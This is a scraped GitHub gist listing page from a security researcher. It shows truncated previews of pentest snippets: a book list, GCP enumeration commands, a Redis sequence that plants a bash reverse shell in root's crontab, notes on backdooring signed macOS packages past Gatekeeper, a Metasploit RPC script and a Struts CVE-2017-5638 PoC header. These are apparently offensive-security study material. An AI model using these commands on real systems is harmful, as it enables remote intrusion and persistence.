Skip to content

Instantly share code, notes, and snippets.

Chris Gates carnal0wnage

Block or report user

Report or block carnal0wnage

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:606c41ac6ec40bf5c69d4db96d9312e3
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
carnal0wnage /
Last active Oct 1, 2019
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
carnal0wnage / DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active Sep 24, 2019
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View gist:df7082a56f1d7bc9681ceb3fea65c0fe
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/ 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
View Backdoor Notes
#Creating signed and customized backdoored macOS applications by abusing Apple Developer tools
Include 1) 1Password (Gatekeeper Approved) 2) StuffIt (Not Approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass)
Alternative one liner:
$ pkgbuild --root /tmp/apps --identifier --install-location /Applications mypackage.pkg
carnal0wnage /
Created Jun 21, 2016 — forked from srv89/
Python code for sending HTML email (Attachment + Multiple Recipients )
__author__ = 'srv'
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
username = '' # Email Address from the email you want to send an email
password = '' # Password
server = smtplib.SMTP('')
carnal0wnage /
Last active Apr 15, 2019
python script to connect to a metasploit msgrpc instance, setup and run an auxilary module.
#!/usr/bin/env python
import sys
import msfrpc
import time
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options
client = msfrpc.Msfrpc({})
# Login to the msf server using the password "abc123"
carnal0wnage /
Created Feb 28, 2019
slightly modified because it was throwing a bytes/string error - change is line 55
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
MAGIC = b"::::MAGIC::::"
# Poc
# ./
# by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
# CVE-2017-5638
# Apache Struts 2 Vulnerability Remote Code Execution
View Preparación
You can’t perform that action at this time.